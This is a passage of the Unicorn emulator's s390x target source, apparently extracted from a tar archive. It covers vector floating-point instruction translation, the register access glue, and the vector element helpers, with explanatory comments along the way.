set_cc_static(s); } else { gen_gvec_2_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), 0, g[es]); } return DISAS_NEXT; } static DisasJumpType op_vstrc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); const uint8_t m6 = get_field(s, m6); static gen_helper_gvec_4 * const g[3] = { gen_helper_gvec_vstrc8, gen_helper_gvec_vstrc16, gen_helper_gvec_vstrc32, }; static gen_helper_gvec_4 * const g_rt[3] = { gen_helper_gvec_vstrc_rt8, gen_helper_gvec_vstrc_rt16, gen_helper_gvec_vstrc_rt32, }; static gen_helper_gvec_4_ptr * const g_cc[3] = { gen_helper_gvec_vstrc_cc8, gen_helper_gvec_vstrc_cc16, gen_helper_gvec_vstrc_cc32, }; static gen_helper_gvec_4_ptr * const g_cc_rt[3] = { gen_helper_gvec_vstrc_cc_rt8, gen_helper_gvec_vstrc_cc_rt16, gen_helper_gvec_vstrc_cc_rt32, }; if (es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m6, 0, 1)) { if (extract32(m6, 2, 1)) { gen_gvec_4_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), tcg_ctx->cpu_env, m6, g_cc_rt[es]); } else { gen_gvec_4_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), tcg_ctx->cpu_env, m6, g_cc[es]); } set_cc_static(s); } else { if (extract32(m6, 2, 1)) { gen_gvec_4_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), m6, g_rt[es]); } else { gen_gvec_4_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), 
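/*
 * VSTRC consumes two flag bits of m6: bit 0 selects the CC-setting
 * helpers, bit 2 the "result type" variants (g_rt/g_cc_rt). Decoded as
 * plain masks:
 *
 *   bool cs = (m6 & 1) != 0; // extract32(m6, 0, 1)
 *   bool rt = (m6 & 4) != 0; // extract32(m6, 2, 1)
 */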
get_field(s, v3), get_field(s, v4), m6, g[es]); } } return DISAS_NEXT; } static DisasJumpType op_vfa(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m4); const uint8_t m5 = get_field(s, m5); const bool se = extract32(m5, 3, 1); gen_helper_gvec_3_ptr *fn; if (fpf != FPF_LONG || extract32(m5, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xe3: fn = se ? gen_helper_gvec_vfa64s : gen_helper_gvec_vfa64; break; case 0xe5: fn = se ? gen_helper_gvec_vfd64s : gen_helper_gvec_vfd64; break; case 0xe7: fn = se ? gen_helper_gvec_vfm64s : gen_helper_gvec_vfm64; break; case 0xe2: fn = se ? gen_helper_gvec_vfs64s : gen_helper_gvec_vfs64; break; default: g_assert_not_reached(); } gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_wfc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); if (fpf != FPF_LONG || m4) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (s->fields.op2 == 0xcb) { gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, gen_helper_gvec_wfc64); } else { gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, gen_helper_gvec_wfk64); } set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_vfc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m4); const uint8_t m5 = get_field(s, m5); const uint8_t m6 = get_field(s, m6); const bool se = extract32(m5, 3, 1); const bool cs = extract32(m6, 0, 1); gen_helper_gvec_3_ptr *fn; if (fpf != FPF_LONG || extract32(m5, 0, 3) || extract32(m6, 1, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (cs) { switch (s->fields.op2) { case 0xe8: fn = se ? gen_helper_gvec_vfce64s_cc : gen_helper_gvec_vfce64_cc; break; case 0xeb: fn = se ? gen_helper_gvec_vfch64s_cc : gen_helper_gvec_vfch64_cc; break; case 0xea: fn = se ? gen_helper_gvec_vfche64s_cc : gen_helper_gvec_vfche64_cc; break; default: g_assert_not_reached(); } } else { switch (s->fields.op2) { case 0xe8: fn = se ? gen_helper_gvec_vfce64s : gen_helper_gvec_vfce64; break; case 0xeb: fn = se ? gen_helper_gvec_vfch64s : gen_helper_gvec_vfch64; break; case 0xea: fn = se ? gen_helper_gvec_vfche64s : gen_helper_gvec_vfche64; break; default: g_assert_not_reached(); } } gen_gvec_3_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), tcg_ctx->cpu_env, 0, fn); if (cs) { set_cc_static(s); } return DISAS_NEXT; } static DisasJumpType op_vcdg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); const uint8_t erm = get_field(s, m5); const bool se = extract32(m4, 3, 1); gen_helper_gvec_2_ptr *fn; if (fpf != FPF_LONG || extract32(m4, 0, 2) || erm > 7 || erm == 2) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xc3: fn = se ? gen_helper_gvec_vcdg64s : gen_helper_gvec_vcdg64; break; case 0xc1: fn = se ? gen_helper_gvec_vcdlg64s : gen_helper_gvec_vcdlg64; break; case 0xc2: fn = se ? gen_helper_gvec_vcgd64s : gen_helper_gvec_vcgd64; break; case 0xc0: fn = se ? gen_helper_gvec_vclgd64s : gen_helper_gvec_vclgd64; break; case 0xc7: fn = se ? 
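/*
 * 0xc7 is VFI, rounding to an integral value in the same format. Note
 * that the comparison helpers chosen by op_vfc() above reuse
 * softfloat's "less-than" with swapped operands, as the helper source
 * itself notes:
 *
 *   // a > b  <=>  b < a (quiet compare; NaNs are unordered)
 *   int gt = float64_lt_quiet(b, a, &env->fpu_status);
 */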
gen_helper_gvec_vfi64s : gen_helper_gvec_vfi64; break; case 0xc5: fn = se ? gen_helper_gvec_vflr64s : gen_helper_gvec_vflr64; break; default: g_assert_not_reached(); } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, deposit32(m4, 4, 4, erm), fn); return DISAS_NEXT; } static DisasJumpType op_vfll(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); gen_helper_gvec_2_ptr *fn = gen_helper_gvec_vfll32; if (fpf != FPF_SHORT || extract32(m4, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m4, 3, 1)) { fn = gen_helper_gvec_vfll32s; } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_vfma(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t m5 = get_field(s, m5); const uint8_t fpf = get_field(s, m6); const bool se = extract32(m5, 3, 1); gen_helper_gvec_4_ptr *fn; if (fpf != FPF_LONG || extract32(m5, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (s->fields.op2 == 0x8f) { fn = se ? gen_helper_gvec_vfma64s : gen_helper_gvec_vfma64; } else { fn = se ? gen_helper_gvec_vfms64s : gen_helper_gvec_vfms64; } gen_gvec_4_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_vfpso(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); const uint8_t m5 = get_field(s, m5); TCGv_i64 tmp; if (fpf != FPF_LONG || extract32(m4, 0, 3) || m5 > 2) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m4, 3, 1)) { tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, v2, 0, ES_64); switch (m5) { case 0: /* sign bit is inverted (complement) */ tcg_gen_xori_i64(tcg_ctx, tmp, tmp, 1ull << 63); break; case 1: /* sign bit is set to one (negative) */ tcg_gen_ori_i64(tcg_ctx, tmp, tmp, 1ull << 63); break; case 2: /* sign bit is set to zero (positive) */ tcg_gen_andi_i64(tcg_ctx, tmp, tmp, (1ull << 63) - 1); break; } write_vec_element_i64(tcg_ctx, tmp, v1, 0, ES_64); tcg_temp_free_i64(tcg_ctx, tmp); } else { switch (m5) { case 0: /* sign bit is inverted (complement) */ gen_gvec_fn_2i(tcg_ctx, xori, ES_64, v1, v2, 1ull << 63); break; case 1: /* sign bit is set to one (negative) */ gen_gvec_fn_2i(tcg_ctx, ori, ES_64, v1, v2, 1ull << 63); break; case 2: /* sign bit is set to zero (positive) */ gen_gvec_fn_2i(tcg_ctx, andi, ES_64, v1, v2, (1ull << 63) - 1); break; } } return DISAS_NEXT; } static DisasJumpType op_vfsq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t fpf = get_field(s, m3); const uint8_t m4 = get_field(s, m4); gen_helper_gvec_2_ptr *fn = gen_helper_gvec_vfsq64; if (fpf != FPF_LONG || extract32(m4, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m4, 3, 1)) { fn = gen_helper_gvec_vfsq64s; } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, 0, fn); return DISAS_NEXT; } static DisasJumpType op_vftci(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint16_t i3 = get_field(s, i3); const uint8_t fpf = get_field(s, m4); const uint8_t m5 = get_field(s, m5); gen_helper_gvec_2_ptr 
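/*
 * op_vfpso above manipulates the IEEE sign with plain integer ops on
 * the raw encoding, so no FP exception can be raised:
 *
 *   static uint64_t f64_neg(uint64_t b)  { return b ^ (1ull << 63); }  // m5=0
 *   static uint64_t f64_nabs(uint64_t b) { return b | (1ull << 63); }  // m5=1
 *   static uint64_t f64_abs(uint64_t b)  { return b & ~(1ull << 63); } // m5=2
 */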
*fn = gen_helper_gvec_vftci64; if (fpf != FPF_LONG || extract32(m5, 0, 3)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (extract32(m5, 3, 1)) { fn = gen_helper_gvec_vftci64s; } gen_gvec_2_ptr(tcg_ctx, get_field(s, v1), get_field(s, v2), tcg_ctx->cpu_env, i3, fn); set_cc_static(s); return DISAS_NEXT; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/unicorn.c�����������������������������������������������������������0000664�0000000�0000000�00000007230�14675241067�0020152�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" #include "internal.h" S390CPU *cpu_s390_init(struct uc_struct *uc, const char *cpu_model); static void s390_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUS390XState *)uc->cpu->env_ptr)->psw.addr = address; } static uint64_t s390_get_pc(struct uc_struct *uc) { return ((CPUS390XState *)uc->cpu->env_ptr)->psw.addr; } static void s390_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; S390CPU *cpu = (S390CPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } s390_cpu_model_finalize((CPUState *)cpu); // TODO: Anymore to free? 
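/*
 * Illustrative usage only: from client code, the PSW address handled by
 * the accessors above is reachable through Unicorn's generic register
 * API (assuming an initialised uc_engine *uc):
 *
 *   uint64_t pc;
 *   uc_reg_read(uc, UC_S390X_REG_PC, &pc);  // routed to s390_get_pc()
 *   uc_reg_write(uc, UC_S390X_REG_PC, &pc); // routed to reg_write() below
 */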
} static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->regs, 0, sizeof(env->regs)); memset(env->aregs, 0, sizeof(env->aregs)); env->psw.addr = 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUS390XState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_S390X_REG_R0 && regid <= UC_S390X_REG_R15) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[regid - UC_S390X_REG_R0]; } else if (regid >= UC_S390X_REG_A0 && regid <= UC_S390X_REG_A15) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regs[regid - UC_S390X_REG_A0]; } else { switch (regid) { default: break; case UC_S390X_REG_PC: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->psw.addr; break; case UC_S390X_REG_PSWM: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = get_psw_mask(env); break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUS390XState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_S390X_REG_R0 && regid <= UC_S390X_REG_R15) { CHECK_REG_TYPE(uint64_t); env->regs[regid - UC_S390X_REG_R0] = *(uint64_t *)value; } else if (regid >= UC_S390X_REG_A0 && regid <= UC_S390X_REG_A15) { CHECK_REG_TYPE(uint32_t); env->regs[regid - UC_S390X_REG_A0] = *(uint32_t *)value; } else { switch (regid) { default: break; case UC_S390X_REG_PC: CHECK_REG_TYPE(uint64_t); env->psw.addr = *(uint64_t *)value; *setpc = 1; break; case UC_S390X_REG_PSWM: CHECK_REG_TYPE(uint64_t); env->psw.mask = *(uint64_t *)value; env->cc_op = (env->psw.mask >> 44) & 3; break; } } return ret; } static int s390_cpus_init(struct uc_struct *uc, const char *cpu_model) { S390CPU *cpu; cpu = cpu_s390_init(uc, cpu_model); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = s390_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = s390_set_pc; uc->get_pc = s390_get_pc; uc->cpus_init = s390_cpus_init; uc->cpu_context_size = offsetof(CPUS390XState, end_reset_fields); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/unicorn.h�����������������������������������������������������������0000664�0000000�0000000�00000000745�14675241067�0020163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2021 */ #ifndef UC_QEMU_TARGET_S390X_H #define UC_QEMU_TARGET_S390X_H // functions to read & write registers uc_err reg_read_s390x(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_s390x(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_s390x(struct uc_struct *uc); #endif 
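/*
 * Note on reg_write() in unicorn.c above: storing UC_S390X_REG_PSWM
 * also refreshes the cached condition code, which lives in PSW bits
 * 18-19 of the mask:
 *
 *   env->cc_op = (env->psw.mask >> 44) & 3; // cc field of the PSW
 */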
���������������������������unicorn-2.1.1/qemu/target/s390x/vec.h���������������������������������������������������������������0000664�0000000�0000000�00000007405�14675241067�0017263�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector utilitites * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef S390X_VEC_H #define S390X_VEC_H #include "tcg/tcg.h" typedef union S390Vector { uint64_t doubleword[2]; uint32_t word[4]; uint16_t halfword[8]; uint8_t byte[16]; } S390Vector; /* * Each vector is stored as two 64bit host values. So when talking about * byte/halfword/word numbers, we have to take care of proper translation * between element numbers. * * Big Endian (target/possible host) * B: [ 0][ 1][ 2][ 3][ 4][ 5][ 6][ 7] - [ 8][ 9][10][11][12][13][14][15] * HW: [ 0][ 1][ 2][ 3] - [ 4][ 5][ 6][ 7] * W: [ 0][ 1] - [ 2][ 3] * DW: [ 0] - [ 1] * * Little Endian (possible host) * B: [ 7][ 6][ 5][ 4][ 3][ 2][ 1][ 0] - [15][14][13][12][11][10][ 9][ 8] * HW: [ 3][ 2][ 1][ 0] - [ 7][ 6][ 5][ 4] * W: [ 1][ 0] - [ 3][ 2] * DW: [ 0] - [ 1] */ #ifndef HOST_WORDS_BIGENDIAN #define H1(x) ((x) ^ 7) #define H2(x) ((x) ^ 3) #define H4(x) ((x) ^ 1) #else #define H1(x) (x) #define H2(x) (x) #define H4(x) (x) #endif static inline uint8_t s390_vec_read_element8(const S390Vector *v, uint8_t enr) { g_assert(enr < 16); return v->byte[H1(enr)]; } static inline uint16_t s390_vec_read_element16(const S390Vector *v, uint8_t enr) { g_assert(enr < 8); return v->halfword[H2(enr)]; } static inline uint32_t s390_vec_read_element32(const S390Vector *v, uint8_t enr) { g_assert(enr < 4); return v->word[H4(enr)]; } static inline uint64_t s390_vec_read_element64(const S390Vector *v, uint8_t enr) { g_assert(enr < 2); return v->doubleword[enr]; } static inline uint64_t s390_vec_read_element(const S390Vector *v, uint8_t enr, uint8_t es) { switch (es) { case MO_8: return s390_vec_read_element8(v, enr); case MO_16: return s390_vec_read_element16(v, enr); case MO_32: return s390_vec_read_element32(v, enr); case MO_64: return s390_vec_read_element64(v, enr); default: g_assert_not_reached(); } } static inline void s390_vec_write_element8(S390Vector *v, uint8_t enr, uint8_t data) { g_assert(enr < 16); v->byte[H1(enr)] = data; } static inline void s390_vec_write_element16(S390Vector *v, uint8_t enr, uint16_t data) { g_assert(enr < 8); v->halfword[H2(enr)] = data; } static inline void s390_vec_write_element32(S390Vector *v, uint8_t enr, uint32_t data) { g_assert(enr < 4); v->word[H4(enr)] = data; } static inline void s390_vec_write_element64(S390Vector *v, uint8_t enr, uint64_t data) { g_assert(enr < 2); v->doubleword[enr] = data; } static inline void s390_vec_write_element(S390Vector *v, uint8_t enr, uint8_t es, uint64_t data) { switch (es) { case MO_8: s390_vec_write_element8(v, enr, data); break; case MO_16: s390_vec_write_element16(v, enr, data); break; case MO_32: s390_vec_write_element32(v, enr, data); break; case MO_64: s390_vec_write_element64(v, enr, data); break; default: g_assert_not_reached(); } } #endif /* S390X_VEC_H */ 
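/*
 * The H1/H2/H4 macros above fold big-endian target element numbers into
 * host addressing with a single XOR. On a little-endian host, target
 * byte element 0 lives at host byte 7 of the first doubleword:
 *
 *   v->byte[H1(0)] // expands to v->byte[0 ^ 7], i.e. v->byte[7]
 *
 * On a big-endian host the macros are the identity mapping.
 */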
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/vec_fpu_helper.c����������������������������������������������������0000664�0000000�0000000�00000044631�14675241067�0021471�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector floating point instruction support * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "cpu.h" #include "internal.h" #include "vec.h" #include "tcg_s390x.h" #include "tcg/tcg-gvec-desc.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define VIC_INVALID 0x1 #define VIC_DIVBYZERO 0x2 #define VIC_OVERFLOW 0x3 #define VIC_UNDERFLOW 0x4 #define VIC_INEXACT 0x5 /* returns the VEX. If the VEX is 0, there is no trap */ static uint8_t check_ieee_exc(CPUS390XState *env, uint8_t enr, bool XxC, uint8_t *vec_exc) { uint8_t vece_exc = 0, trap_exc; unsigned qemu_exc; /* Retrieve and clear the softfloat exceptions */ qemu_exc = env->fpu_status.float_exception_flags; if (qemu_exc == 0) { return 0; } env->fpu_status.float_exception_flags = 0; vece_exc = s390_softfloat_exc_to_ieee(qemu_exc); /* Add them to the vector-wide s390x exception bits */ *vec_exc |= vece_exc; /* Check for traps and construct the VXC */ trap_exc = vece_exc & env->fpc >> 24; if (trap_exc) { if (trap_exc & S390_IEEE_MASK_INVALID) { return enr << 4 | VIC_INVALID; } else if (trap_exc & S390_IEEE_MASK_DIVBYZERO) { return enr << 4 | VIC_DIVBYZERO; } else if (trap_exc & S390_IEEE_MASK_OVERFLOW) { return enr << 4 | VIC_OVERFLOW; } else if (trap_exc & S390_IEEE_MASK_UNDERFLOW) { return enr << 4 | VIC_UNDERFLOW; } else if (!XxC) { g_assert(trap_exc & S390_IEEE_MASK_INEXACT); /* inexact has lowest priority on traps */ return enr << 4 | VIC_INEXACT; } } return 0; } static void handle_ieee_exc(CPUS390XState *env, uint8_t vxc, uint8_t vec_exc, uintptr_t retaddr) { if (vxc) { /* on traps, the fpc flags are not updated, instruction is suppressed */ tcg_s390_vector_exception(env, vxc, retaddr); } if (vec_exc) { /* indicate exceptions for all elements combined */ env->fpc |= vec_exc << 16; } } typedef uint64_t (*vop64_2_fn)(uint64_t a, float_status *s); static void vop64_2(S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool s, bool XxC, uint8_t erm, vop64_2_fn fn, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i, old_mode; old_mode = s390_swap_bfp_rounding_mode(env, erm); for (i = 0; i < 2; i++) { const uint64_t a = s390_vec_read_element64(v2, i); s390_vec_write_element64(&tmp, i, fn(a, &env->fpu_status)); vxc = check_ieee_exc(env, i, XxC, &vec_exc); if (s || vxc) { break; } } s390_restore_bfp_rounding_mode(env, old_mode); handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } typedef uint64_t (*vop64_3_fn)(uint64_t a, uint64_t b, float_status *s); static void 
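/*
 * check_ieee_exc() above packs the vector exception code (VXC) with the
 * element index in the high nibble and the cause in the low nibble:
 *
 *   uint8_t vxc = (uint8_t)((enr << 4) | VIC_OVERFLOW); // element 1 -> 0x13
 *
 * A zero VXC means "no trap"; non-trapping flags are instead ORed into
 * the FPC flag byte by handle_ieee_exc().
 */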
vop64_3(S390Vector *v1, const S390Vector *v2, const S390Vector *v3, CPUS390XState *env, bool s, vop64_3_fn fn, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int i; for (i = 0; i < 2; i++) { const uint64_t a = s390_vec_read_element64(v2, i); const uint64_t b = s390_vec_read_element64(v3, i); s390_vec_write_element64(&tmp, i, fn(a, b, &env->fpu_status)); vxc = check_ieee_exc(env, i, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; } static uint64_t vfa64(uint64_t a, uint64_t b, float_status *s) { return float64_add(a, b, s); } void HELPER(gvec_vfa64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, false, vfa64, GETPC()); } void HELPER(gvec_vfa64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vop64_3(v1, v2, v3, env, true, vfa64, GETPC()); } static int wfc64(const S390Vector *v1, const S390Vector *v2, CPUS390XState *env, bool signal, uintptr_t retaddr) { /* only the zero-indexed elements are compared */ const float64 a = s390_vec_read_element64(v1, 0); const float64 b = s390_vec_read_element64(v2, 0); uint8_t vxc, vec_exc = 0; int cmp; if (signal) { cmp = float64_compare(a, b, &env->fpu_status); } else { cmp = float64_compare_quiet(a, b, &env->fpu_status); } vxc = check_ieee_exc(env, 0, false, &vec_exc); handle_ieee_exc(env, vxc, vec_exc, retaddr); return float_comp_to_cc(env, cmp); } void HELPER(gvec_wfc64)(const void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = wfc64(v1, v2, env, false, GETPC()); } void HELPER(gvec_wfk64)(const void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { env->cc_op = wfc64(v1, v2, env, true, GETPC()); } typedef int (*vfc64_fn)(float64 a, float64 b, float_status *status); static int vfc64(S390Vector *v1, const S390Vector *v2, const S390Vector *v3, CPUS390XState *env, bool s, vfc64_fn fn, uintptr_t retaddr) { uint8_t vxc, vec_exc = 0; S390Vector tmp = { 0 }; int match = 0; int i; for (i = 0; i < 2; i++) { const float64 a = s390_vec_read_element64(v2, i); const float64 b = s390_vec_read_element64(v3, i); /* swap the order of the parameters, so we can use existing functions */ if (fn(b, a, &env->fpu_status)) { match++; s390_vec_write_element64(&tmp, i, -1ull); } vxc = check_ieee_exc(env, i, false, &vec_exc); if (s || vxc) { break; } } handle_ieee_exc(env, vxc, vec_exc, retaddr); *v1 = tmp; if (match) { return s || match == 2 ? 
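/*
 * Condition code convention for the vector FP compares: 0 if every
 * processed lane matched, 1 on a mix, 3 if none matched (cc 2 is
 * unused). With two lanes, or one lane in single-element mode:
 *
 *   static int vfc_cc(int match, int lanes)
 *   {
 *       if (match == lanes) return 0;
 *       if (match == 0)     return 3;
 *       return 1;
 *   }
 */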
0 : 1; } return 3; } void HELPER(gvec_vfce64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, false, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfce64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, true, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfce64_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, false, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfce64s_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, true, float64_eq_quiet, GETPC()); } void HELPER(gvec_vfch64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, false, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfch64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, true, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfch64_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, false, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfch64s_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, true, float64_lt_quiet, GETPC()); } void HELPER(gvec_vfche64)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, false, float64_le_quiet, GETPC()); } void HELPER(gvec_vfche64s)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { vfc64(v1, v2, v3, env, true, float64_le_quiet, GETPC()); } void HELPER(gvec_vfche64_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, false, float64_le_quiet, GETPC()); } void HELPER(gvec_vfche64s_cc)(void *v1, const void *v2, const void *v3, CPUS390XState *env, uint32_t desc) { env->cc_op = vfc64(v1, v2, v3, env, true, float64_le_quiet, GETPC()); } static uint64_t vcdg64(uint64_t a, float_status *s) { return int64_to_float64(a, s); } void HELPER(gvec_vcdg64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, erm, vcdg64, GETPC()); } void HELPER(gvec_vcdg64s)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, true, XxC, erm, vcdg64, GETPC()); } static uint64_t vcdlg64(uint64_t a, float_status *s) { return uint64_to_float64(a, s); } void HELPER(gvec_vcdlg64)(void *v1, const void *v2, CPUS390XState *env, uint32_t desc) { const uint8_t erm = extract32(simd_data(desc), 4, 4); const bool XxC = extract32(simd_data(desc), 2, 1); vop64_2(v1, v2, env, false, XxC, 